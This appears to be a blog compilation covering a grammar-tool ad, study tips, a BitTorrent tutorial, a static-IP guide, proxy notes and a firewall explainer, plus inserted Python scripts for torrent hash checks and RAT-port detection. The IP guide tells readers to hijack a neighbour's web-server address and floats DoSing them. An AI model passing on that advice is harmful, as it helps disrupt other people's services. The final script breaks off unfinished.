
Sunday, March 3, 2013

Get a FREE 7-day trial Correct Your Grammar and Spellings

When speaking English we don't need to give much importance to grammar, but when it comes to writing, grammar is really important. Even for a simple document, the grammar needs to be perfect. For writers especially, grammar is a major factor when preparing documents. Even professionals may make grammar mistakes when preparing documents in a hurry. To avoid these types of grammatical errors there are plenty of online and offline applications available, but accuracy matters when it comes to grammar checking.

 

Grammarly is a new web application for checking grammar in the documents you write. Unlike other applications, it has plenty of features and a variety of grammar checking options for different types of documents. This will be very helpful for students, job seekers and people who send lots of emails every day. A document without grammar errors creates a good impression and gives you more confidence in your work. The Grammarly team says that once you start scanning your document with the application, it checks around 250 points of grammar in your document. It will not abruptly change your document; it only suggests changes that can be made. You can either accept a suggestion and make the change, or ignore it and proceed.


Grammarly also helps you enhance your sentences by suggesting new words for the existing ones. It has excellent built-in, context-optimized synonyms to improve the readability of your documents. The spell checker in the application will help you tell apart commonly confused words like lose/loose, affect/effect, etc. You don't need to download any software to use Grammarly on your computer. Just sign up for the application with your email ID and start using it in your browser and in other desktop applications like Microsoft Word, Outlook, etc.

It is a premium application; the trial period is available for only seven days, after which you need to select a plan to continue. Once you sign up, the list of plans is available in the application itself. It will also help you improve your writing skills by avoiding the common mistakes you make. Grammarly learns the mistakes you make often and helps you get rid of them. The results are very quick, so you don't need to spend a lot of time proofreading your document. The built-in proofreading software has received plenty of positive reviews from users and many writers.

Get a FREE 7-day trial

http://www.grammarly.com/

Friday, November 18, 2011

Top Ten Tips for Increasing Concentration

1. Start assignments with some curiosity about the material and a positive attitude toward learning.


2. Designate a place where you go only to study. Use proper lighting.


3. Identify your distractions. Find ways to decrease them or to postpone them until study breaks (e.g., taking the phone off the hook, turning off instant messenger).


4. Decrease noises around you while studying. If you need some background music it should be soft. Keep the TV off.


5. Use "active study" techniques: sit straight in a chair at a desk, start out with questions about the material, outline chapters, underline key phrases after reading a section, write notes in margins, ask yourself what you have learned.


6. Divide your work into smaller manageable tasks that can be completed in a short period of time. Push yourself to complete one small task, then move on to the next task. Focus on one small task at a time.


7. Use times of peak alertness for studying difficult or less interesting topics. When you are tired or hungry concentration will be lowered.

8. When your mind starts to wander come up with some cue words to say to yourself (e.g., "Focus." "Get back on task.") to focus your concentration again.


9. Take breaks when you have completed tasks or when you feel concentration has decreased. Breaks should be approximately 10-15 minutes.


10. If you have other assignments or issues on your mind write them down on a "to do" list or take a small step to deal with them. Then get back to focusing on the task at hand.

HINDI SHER


Saturday, October 30, 2010

HOW TO DOWNLOAD MOVIES BY BITTORRENT

Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later).
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one big chunk, you are able to download from many people at once, increasing your download speeds. There may be 100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb).
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).
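
The piece structure mentioned in the list above can be read and checked directly. The following is an added example, not part of the original tutorial: it decodes a .torrent file (bencode format), reads the piece length and the per-piece SHA-1 hashes from its info dictionary, and reports which pieces of a downloaded file fail verification. The sample torrent, tracker URL, file name and payload are constructed for illustration.

```python
import hashlib


def bdecode(data, i=0):
    """Decode one bencoded value starting at data[i]; return (value, next_index)."""
    c = data[i:i + 1]
    if c == b"i":                                  # integer: i<digits>e
        end = data.index(b"e", i)
        return int(data[i + 1:end]), end + 1
    if c == b"l":                                  # list: l<items>e
        i += 1
        items = []
        while data[i:i + 1] != b"e":
            item, i = bdecode(data, i)
            items.append(item)
        return items, i + 1
    if c == b"d":                                  # dictionary: d<key><value>...e
        i += 1
        result = {}
        while data[i:i + 1] != b"e":
            key, i = bdecode(data, i)
            result[key], i = bdecode(data, i)
        return result, i + 1
    if c.isdigit():                                # byte string: <length>:<bytes>
        colon = data.index(b":", i)
        start = colon + 1
        end = start + int(data[i:colon])
        if end > len(data):
            raise ValueError("string runs past end of data")
        return data[start:end], end
    raise ValueError(f"invalid bencode at offset {i}")


def bencode(value):
    """Encode ints, bytes, lists and dicts; used here only to build the sample."""
    if isinstance(value, int):
        return b"i%de" % value
    if isinstance(value, bytes):
        return b"%d:%s" % (len(value), value)
    if isinstance(value, list):
        return b"l" + b"".join(bencode(v) for v in value) + b"e"
    if isinstance(value, dict):
        body = b"".join(bencode(k) + bencode(value[k]) for k in sorted(value))
        return b"d" + body + b"e"
    raise TypeError(f"cannot bencode {type(value).__name__}")


def piece_info(torrent_bytes):
    """Return (piece_length, [20-byte SHA-1 per piece], total_length) for a single-file torrent."""
    meta, end = bdecode(torrent_bytes)
    if end != len(torrent_bytes):
        raise ValueError("trailing data after torrent dictionary")
    info = meta[b"info"]
    hashes = info[b"pieces"]
    if len(hashes) % 20:
        raise ValueError("pieces field is not a multiple of 20 bytes")
    split = [hashes[i:i + 20] for i in range(0, len(hashes), 20)]
    return info[b"piece length"], split, info[b"length"]


def failed_pieces(torrent_bytes, payload):
    """Return the indexes of pieces whose SHA-1 does not match the torrent."""
    piece_len, hashes, _total = piece_info(torrent_bytes)
    bad = []
    for index, expected in enumerate(hashes):
        chunk = payload[index * piece_len:(index + 1) * piece_len]
        if hashlib.sha1(chunk).digest() != expected:
            bad.append(index)                      # corrupted or missing piece
    return bad


# Constructed sample: a 1080-byte payload split into 256-byte pieces.
PAYLOAD = b"constructed sample payload " * 40
PIECE_LEN = 256
SAMPLE_TORRENT = bencode({
    b"announce": b"http://tracker.example/announce",
    b"info": {
        b"length": len(PAYLOAD),
        b"name": b"sample.bin",
        b"piece length": PIECE_LEN,
        b"pieces": b"".join(
            hashlib.sha1(PAYLOAD[i:i + PIECE_LEN]).digest()
            for i in range(0, len(PAYLOAD), PIECE_LEN)
        ),
    },
})

if __name__ == "__main__":
    length, hashes, total = piece_info(SAMPLE_TORRENT)
    print(f"{total} bytes in {len(hashes)} pieces of {length} bytes")
    damaged = bytearray(PAYLOAD)
    damaged[600] ^= 0xFF                           # flip one byte inside piece 2
    print("pieces failing verification:", failed_pieces(SAMPLE_TORRENT, bytes(damaged)))
```

A client performs the same comparison on every piece it receives, which is why data from many unknown peers can be combined into one file: a piece that does not match its hash is discarded and requested again.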

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there is that they are extremely CPU intensive, usually using 100% of your CPU power during the whole process. This is the number one reason I use Azureus. Another is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanatory, it's the date the torrent was added.
Name: Also self explanatory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people are currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Voilà, all the available downloads appear in the main chart above. Just double click a download you want, and bang, it's starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring, so people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

Tuesday, October 19, 2010

IP ADDRESS CHANGE HOW TO

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.
1. Getting your IP range - Getting information about your IP range is not difficult; I recommend using Neo Trace on your own IP. But for my test just look at your IP address: say it's 24.193.110.13, you can definitely use the IPs found between 24.193.110.1 < [new IP] < 24.193.110.255; don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, then look for "IP Address. . . . . . . . . . . . : x.x.x.x".
2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:

Windows IP Configuration:
Host Name . . . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . . . :
Node Type . . . . . . . . . . . . . . .: Unknown
IP Routing Enabled. . . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x
Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . . . . . . : Yes
IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0
Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM
This is all the information you will need for now. I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere; to copy, right click the window and select text and click once.


III. Changing your IP Address
To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is usually a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General tab. In the new window that pops up select Internet Protocol (TCP/IP) and click Properties; it's under the General tab. In this new window select the General tab and choose "Use the following IP address". For the IP address enter the IP you would like to use (the one you picked from your subnet earlier), and for the Subnet Mask enter the subnet mask you got when you ran ipconfig /all; the same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked: try to refresh a website, and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one.


IV. DDoS & DoS Protection
If your firewall shows that you are being DDoSed (this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS)), you can protect yourself by changing your IP address via the method I described above.


V. Web servers & Other Services
If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself.
To "steal" an IP is to basically use the changing IP address method above and pick an IP that someone who is running a web server has in use. Often you will be able to keep that IP at least for some time; other times you won't be able to use it, so just keep trying until it works. You yourself will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend it as it's pretty illegal, and your ISP will get pissed ;)

What is a Proxy Server?

A proxy server is a kind of buffer between your computer and the Internet resources you are accessing. The data you request comes to the proxy first, and only then does it transmit the data to you. I know many are looking for IP Maskers or Scramblers, but honestly, it isn't really easy, for the simple fact that any website that you visit needs your IP to send the info packets to. If it's scrambled, you will get a lot of errors and crazy redirects :P My solution? Read on... For a good list of proxy servers try here>> http://www.multiproxy.org/


Why do I need to use proxy servers?
Transfer speed improvement. Proxy servers accumulate and save files that are most often requested by thousands of Internet users in a special database, called “cache”. Therefore, proxy servers are able to increase the speed of your connection to the Internet. The cache of a proxy server may already contain information you need by the time of your request, making it possible for the proxy to deliver it immediately.


Security and privacy. Anonymous proxy servers hide your IP address, thereby saving you from vulnerabilities concerned with it.
Sometimes you may encounter problems accessing a web server when the server administrator has restricted access from your IP or even from a wide IP range (for example restricting access from certain countries or geographical regions). So you try to access those pages using an anonymous proxy server.


What is a public proxy server?
It is a proxy server which is free and open for everybody on the Internet. Unfortunately most of them are not anonymous.
Free services try to provide lists of public HTTP proxy servers. They usually provide a small list of proxies with a low percentage of functioning servers, due to hosting restrictions on CPU time (they simply can't allow themselves to check many proxies every second, especially in parallel).


The Solution?
When using an anonymous proxy server you don't give anybody a chance to find out your IP address to use it in their own interests. ;) If there is a need to make an (inner) proxy connect to the outside world via another (outer) proxy server, you can use the same environment variables as are used to redirect clients to the proxy to make the inner proxy use the outer one:
http_proxy
ftp_proxy
gopher_proxy
wais_proxy
E.g. your (inner) proxy server's startup script could look like this:
#!/bin/sh
http_proxy=http://outer.proxy.server:8082/
export http_proxy
/usr/etc/httpd -r /etc/inner-proxy.conf -p 8081
This is a little ugly, so there are also the following directives in the configuration file:
http_proxy http://outer.proxy.server/
ftp_proxy http://outer.proxy.server/
gopher_proxy http://outer.proxy.server/
wais_proxy http://outer.proxy.server/

What is a Firewall? ALL ABOUT FIREWALL


A firewall is a tool that monitors communication to and from your computer. It sits between your computer and the rest of the network, and according to some criteria, it decides which communication to allow, and which communication to block. It may also use some other criteria to decide about which communication or communication request to report to you (either by adding the information to a log file that you may browse whenever you wish, or in an alert message on the screen), and what not to report.
What Is It Good For?


Identifying and blocking remote access Trojans. Perhaps the most common way to break into a home computer and gain control is by using a remote access Trojan (RAT), sometimes called a "backdoor Trojan" or "backdoor program". (Many people simply call it a "Trojan horse", although the term "Trojan horse" is much more generic.) A Trojan horse is a program that claims to do something really innocent, but in fact does something much less innocent. The name goes back to the days when the Greek soldiers succeeded in entering through the gates of Troy by building a big wooden horse and giving it as a present to the king of Troy. The soldiers allowed the sculpture to enter through their gates, and then at night, when the soldiers were busy guarding against an outside attack, many Greek soldiers who were hiding inside the horse came out and attacked Troy from the inside. This story, which may or may not be true, is an example of something which looks innocent and is used for some less innocent purpose. The same thing happens in computers. You may sometimes get some program, via ICQ, or via Usenet, or via IRC, and believe this program to be something good, while in fact running it will do something less nice to your computer. Such programs are called Trojan horses. It is generally accepted that the difference between a Trojan horse and a virus is that a virus has the ability to self-replicate and to distribute itself, while a Trojan horse lacks this ability. A special type of Trojan horse is the RAT (Remote Access Trojan; some say "remote admin Trojan"). These Trojans, once executed on the victim's computer, start to listen for incoming communication from a matching remote program that the attacker uses. When they get instructions from the remote program, they act accordingly, and thus let the user of the remote program execute commands on the victim's computer.
To name a few famous RATs, the most common are Netbus, Back-Orifice, and SubSeven (which is also known as Backdoor-G). In order for the attacker to use this method, your computer must first be infected by a RAT.


Prevention of infection by RATs is no different from prevention of infection by viruses. Antivirus programs can identify and remove most of the more common RATs. Personal firewalls can identify and block remote communication efforts to the more common RATs, thereby both blocking the attacker and identifying the RAT.


Blocking/Identifying Other Types of Trojans and Worms?
There are many other types of Trojan horses which may try to communicate with the outside from your computer. They may be e-mail worms trying to distribute themselves using their own SMTP engine, password stealers, or anything else. Many of them can be identified and blocked by a personal firewall.


Identifying/Blocking Spyware/Adbots?
The term "spyware" is slang and is not well defined. It is commonly used mainly for various adware (adware being a program that is supported by presenting advertisements to the user) that, during the installation process, installs an independent program which we shall call an "adbot". The adbot runs independently even if the hosting adware is not running, and it maintains the advertisements, downloads them from the remote server, and provides information to the remote server. The adbot is usually hidden. There are many companies that offer adbots and advertisement services to adware. The information that the adbots deliver to their servers from the computer where the adbot is installed is how much time each advertisement is shown, which was the hosting adware, and whether the user clicked on the advertisement. This is important so that the advertisement server will be able to know how much money to get from each of the advertised companies, and how much of it to deliver to each of the adware maintainers. Some of the adbots also collect other information in order to better choose the advertisements for the users. The term "spyware" is more generic, but most spyware falls into this category. Many types of adbots can be identified and blocked by personal firewalls.
Blocking Advertisements?
Some of the better personal firewalls can be set to block communication with specific sites. This can be used in order to prevent downloading of advertisements in web pages, and thus to accelerate the download process of the web sites. This is not a very common use of a personal firewall, though.
Preventing Communication to Tracking Sites?
Some web pages contain references to tracking sites. e.g. instruct the web browser to download a small picture (sometimes invisible) from tracking sites. Sometimes, the pictures are visible and provide some statistics about the site. Those tracking sites will try to save a small text either as a small file in a special directory, or as a line in a special file (depending on what is your browser), and your browser will usually allow the saving site to read the text that it saved on your computer. This is called "web cookies" or sometimes simply "cookies". Cookies allow a web site to keep information that it saved some time when you entered it, to be read whenever you enter the site again. This allow the web site to customize itself for you, and to keep track on everything that you did on that site. It does not have to keep that information on your computer. All it has to save on your computer is a unique identifying number, and then it can keep in the server's side information regarding what has been done by the browser that used that cookie. Yet, by this method, a web site can get only information regarding your visits in it. Some sites such as "doubleclick" or "hitbox" can collect information from various affiliated sites, by putting a small reference in the affiliated pages to some picture on their servers. When you enter one of the affiliated web pages, your browser will communicate with the tracking site, and this will allow the tracking site to put or to read a cookie that identifies your computer uniquely, and it can also know what was the web page that referred to it, and any other information that the affiliated web site wanted to deliver to the tracking site. This way tracking sites can correlate information from many affiliated sites, to build information that for example will allow them to better customize the advertisements that are put on those sites when you browse them.
Some personal firewalls can be set to block communication to tracking sites. It is not a common use of a personal firewall, though, and a personal firewall is not the best tool for that, but if you already have one, this is yet another possible use of it.
Blocking or Limiting the NetBIOS Communication? (as well as other default services)
The two common methods intruders use to break into home computers are through a RAT (which was discussed in II.3a) and through the NetBIOS communication. NetBIOS is a standard for naming computers in small networks, developed long ago by IBM and Microsoft. There are a few communication standards which are used in relation to NetBIOS. The ones that are relevant for Microsoft Windows operating systems are: NBT (NetBIOS over TCP/IP), IPX/SPX, and NetBEUI. The communication standard which is used over the Internet is NBT. If it is enabled, and there is no firewall or something else in the middle, it means that your computer is listening for communications over the Internet via this standard, and will react according to the different NBT commands that it gets from the remote programs. Thus NBT (which is sometimes loosely called "NetBIOS") is acting as a server. So the next question should be "which remote NBT commands will the NBT server carry out on the local computer?" The answer to this question depends on the specific settings on your computer. You may set your computer to allow file and print sharing. If NBT is also enabled, it means that you allow remote users to share your files or printers. This is a big problem. It is true that in principle the remote user has to know your password for that computer, but many users do not set a password for their user on Windows, or set a trivial password. Older versions of Win95 had file and print sharing over NetBIOS enabled by default. On Win98 and WinMe it was disabled by default, but many technicians, when they set up a home network, enable file and print sharing without being aware that it also influences the authorizations of a remote Internet user. There are even worms and viruses which use the file sharing option to spread over the Internet.
Anyway, no matter whether you need it for some reason or just are not aware of it, a personal firewall can identify and block any external effort to communicate with the NetBIOS server on your computer. The more flexible personal firewalls can be set to restrict the authorization to communicate with the NetBIOS. Some Windows operating systems, especially those which are not meant for home uses, offer other public services by default, such as RPC. A firewall can identify communication efforts to them, and block them. Since such services listen to remote communications, there is a potential risk when there are efforts to exploit security holes in the programs that offer the services, if there are such security holes. A firewall may block or limit the communication to those services.
Hiding Your Computer on the Internet?
Without a firewall, on a typical computer, even if well maintained, a remote person will still be able to know that the communication effort has reached some computer, and perhaps some information about the operating system on that computer. If that computer is handled well, the remote user will not be able to get much more information from your computer, but might still be able to identify also who your ISP is, and might decide to invest further time in cracking into your computer.
With a firewall, you can set the firewall so that any communication effort from remote users (in the better firewalls you may define an exception list) will not be responded at all. This way the remote user will not be able to even know that it reached a live computer. This might discourage the remote attacker from investing further time in effort to crack into your computer.


The Non-Firewall Defenses
We've discussed a few situations where a personal firewall can provide defense. Yet, in many cases a computer maintainer can deal with those situations even without a firewall. Those "alternative" defenses, in many cases are recommended regardless of whether you use a firewall or not.
Remote Access Trojans?
The best way to defend against remote access Trojans (RATs) is to prevent them from being installed on your computer in the first place. A RAT must first infect your computer in order to start to listen for remote communication efforts. The infection techniques are very similar to the infection techniques that viruses use, and hence the defense against Trojan horses is similar to the defense against viruses. Trojan horses do not distribute themselves (although they might be companions of another Internet worm or virus that distributes them). Yet, because in most cases they do not distribute themselves, it is likely that you will get them from anonymous sources, such as instant messengers, Kazaa, IRC, or a newsgroup. Adopting a suspicious policy regarding downloads from such places will save you not only from viruses but also from getting infected with Trojan horses, including RATs. Because Trojan horses are similar in some ways to viruses, almost all antivirus programs can identify, block from being installed, and remove most of the Trojan horses, including all the common ones. There are also some programs (sometimes called antiTrojan programs) which specialize in the identification and removal of Trojan horses. For a list of those programs, and for a comparison of how well different antivirus and antiTrojan programs identify different Trojan horses, see Hackfix (http://www.hackfix.org), under "Software test results". Hackfix also has information on the more common RATs (such as Netbus and Subseven) and on how to remove them manually. There are some tools and web sites, such as port scanners, and some ways of using more generic tools such as telnet, msconfig, and netstat, which may help you to identify a RAT.
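
One way to use netstat for this check, as an added example that is not part of the original article: the script below parses the output of "netstat -an" and flags sockets listening on the well-known default ports of the RATs named earlier (NetBus, Back Orifice, SubSeven) and on the NetBIOS and RPC service ports discussed above. The sample output and its addresses are constructed; a RAT can be configured to use any port, so an empty result is not proof that a machine is clean.

```python
from typing import NamedTuple

# (protocol, port) -> why a listener there deserves a look.
# These are default ports only; an attacker can reconfigure them.
WATCHED = {
    ("TCP", 12345): "NetBus default port",
    ("TCP", 12346): "NetBus default port",
    ("TCP", 27374): "SubSeven default port",
    ("TCP", 1243): "SubSeven default port (older versions)",
    ("UDP", 31337): "Back Orifice default port",
    ("TCP", 135): "RPC endpoint mapper",
    ("UDP", 137): "NetBIOS name service",
    ("UDP", 138): "NetBIOS datagram service",
    ("TCP", 139): "NetBIOS session service (file and print sharing)",
}


class Finding(NamedTuple):
    proto: str
    local_ip: str
    port: int
    reason: str
    remote_reachable: bool   # False when bound to loopback only


def listening_sockets(netstat_text):
    """Yield (proto, local_ip, port) for each listening socket in `netstat -an` output."""
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue                      # banner, header or blank line
        proto, local = fields[0], fields[1]
        state = fields[3] if len(fields) > 3 else ""
        # TCP rows carry a state; only LISTENING sockets accept new connections.
        # UDP rows have no state column: every bound UDP socket can receive.
        if proto == "TCP" and state != "LISTENING":
            continue
        ip, _, port = local.rpartition(":")
        if port.isdigit():
            yield proto, ip, int(port)


def flag_listeners(netstat_text):
    """Return a Finding for every listener on a watched port."""
    findings = []
    for proto, ip, port in listening_sockets(netstat_text):
        reason = WATCHED.get((proto, port))
        if reason is None:
            continue
        loopback = ip.startswith("127.") or ip == "[::1]"
        findings.append(Finding(proto, ip, port, reason, not loopback))
    return findings


# Constructed sample of `netstat -an` output (addresses are placeholders).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:27374        0.0.0.0:0              LISTENING
  TCP    192.168.0.10:139       0.0.0.0:0              LISTENING
  TCP    192.168.0.10:1243      203.0.113.7:80         ESTABLISHED
  TCP    192.168.0.10:1050      203.0.113.9:80         ESTABLISHED
  UDP    0.0.0.0:31337          *:*
  UDP    192.168.0.10:137       *:*
"""

if __name__ == "__main__":
    for f in flag_listeners(SAMPLE_NETSTAT):
        scope = "reachable from the network" if f.remote_reachable else "loopback only"
        print(f"{f.proto} {f.local_ip}:{f.port}  {f.reason}  ({scope})")
```

The ESTABLISHED row with local port 1243 is not reported: it is an outgoing connection that happens to use that port number, not a listener waiting for an attacker.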


Other types of Trojans and worms?
Also here your main interest should be to prevent them from infecting your computer in the first place, rather than blocking their communication. A good antivirus and a good policy regarding the prevention of virus infections, should be the first and most important defense.
Spyware and Adbots?


The term spyware is sometimes misleading. In my view, it is the responsibility of the adware developer to present the fact that the adware installation will install or use an independent adbot, and to provide the information on how this adbot communicates, and which information it delivers, in a fair place and manner before the adware is installed. It is also a responsibility to provide this information on their web sites, so that people will be aware of that before they even download the software. Yet, in general, those adbots do not pose any security threat, and in many cases also their privacy threat is negligible for many people (e.g. the computer with adbot number 1127533 has been exposed to advertisements a, b, c, such and such times, while using adware x, while the computer with adbot number 1127534 has been exposed to advertisements a, d, and e, such amount of time, with the use of adware y, and clicked on ad number d). It should be fully legitimate for software developers to offer advertisement supported programs, and it is up to the user to decide whether the use of the program is worth the ads and the adbot, or not. Preventing an adbot from communicating is generally not a moral thing. If you decide to use adware, you should pay the price of letting the adbot work. If you don't want it, please remove the adware, and only if for some reason the adbot continues to work even if no hosting adware that uses it is installed, you may remove the adbot. Anyway, there are some very useful tools to identify whether a program is "spyware", or whether "spyware" is installed on your computer, and you are certainly entitled to this information. Two useful programs are "AdAware", which identifies "spyware" components on your computer and allows you to remove them, and Ad-Search, which allows you to provide the name of a program, and it tells you whether this program is "spyware" and which adbot it uses.
It is useful to assist you in choosing whether to install a program or not. You may find those programs in http://www.lavasoft.nu (or, if it doesn't work, you may try http://www.lavasoftusa.com). Those programs are useful, mainly because many adware developers are not fair enough to present this information in a fair manner. AdAware allows you to also remove those adbot components from your computer. This might, however, terminate your license to use the hosting adware programs, and might even cause them to stop functioning. A website which offers to check whether a specific program that you wish to install is "spyware" or not, is http://www.spychecker.com .


Blocking Advertisements?
Leaving aside the moral aspect of blocking advertisements, a personal firewall is not the best tool for that anyway. This is neither the main purpose of a firewall nor its main strength. Some of them can block some advertisements from being downloaded, if you know how to configure them for that. Yet, there are better tools for that, such as Proxomitron (http://www.proxomitron.org), CookieCop 2 (search for the word cookiecop on http://www.pcmag.com), or Naviscope (http://www.naviscope.com), and there are many other programs as well. You may check for other alternatives, e.g. in Tucows (http://www.tucows.com/adkiller95.html).


Blocking Tracking Sites?
Here too, a personal firewall is not the best tool, and there are other tools and ways which are more effective. These are cookie utilities. Since a tracking site uses a cookie to identify and relate the information gathered to the same person (or computer), preventing the cookie from being installed makes the tracking site lose its ability to track things. There are plenty of cookie management utilities. Some of them are freeware, and some are not. CookieCop, which was mentioned in the former section, is one of them. WebWasher (http://www.webwasher.com) is another recommended one, and there are plenty of other alternatives such as cookie-crusher, cookie-pal, pop-up killer, etc. You may search for other alternatives in Tucows (http://www.tucows.com/cookie95.html).


NetBIOS and Other Services?
NetBIOS over TCP/IP (NBT), which is sometimes loosely called "NetBIOS", is a service with some security problems. It is enabled by default in default Windows installations, and it is very common to see a firewall doing the job of blocking efforts to get access to your computer via NBT. Yet, in almost all cases, this service is not needed, and thus can be disabled. Disabling NBT in Win95/98/ME is not as simple as it is in Win2K/XP, but can still be done reliably. We explain how to do this in another article (#to be written soon). Needless to say, if NBT is disabled, there is no need for a firewall to block communication to it. The same goes for other services, such as RPC services: in many cases you simply don't need them, and it is better to disable them from within Windows than to use the firewall to block them. There are various ways to know which services are running on your computer, and which of them are listening for communications from the outside. If there are ones that you don't need, they should be disabled.
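One way to see which services are listening, as an added example that is not part of the original article: the Python sketch below parses the output of Windows `netstat -an` and flags NBT and RPC listeners bound to a non-loopback address. The sample output is constructed, and the port numbers (135 for the RPC endpoint mapper, 137 to 139 for NBT) are the well-known defaults, stated here as this example's assumption.

```python
"""Added example: review `netstat -an` output for NBT and RPC listeners."""

# Well-known default ports for the services the text names (assumption of
# this example): RPC endpoint mapper and the three NetBIOS-over-TCP/IP ports.
WATCHED = {
    ("TCP", 135): "RPC endpoint mapper",
    ("UDP", 137): "NBT name service",
    ("UDP", 138): "NBT datagram service",
    ("TCP", 139): "NBT session service",
}

# Constructed sample of Windows `netstat -an` output (addresses are made up).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1027         0.0.0.0:0              LISTENING
  TCP    192.168.1.5:139        0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1045       203.0.113.10:80        ESTABLISHED
  UDP    192.168.1.5:137        *:*
  UDP    192.168.1.5:138        *:*
"""


def parse_listeners(netstat_text):
    """Return sockets that accept traffic: TCP in LISTENING state, and every
    bound UDP socket (UDP has no state column)."""
    listeners = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue  # banner, column header or blank line
        proto, local = fields[0], fields[1]
        state = fields[3] if len(fields) > 3 else ""
        if proto == "TCP" and state != "LISTENING":
            continue  # established or closing connection, not a listener
        host, _, port = local.rpartition(":")
        if port.isdigit():
            listeners.append({"proto": proto, "host": host, "port": int(port)})
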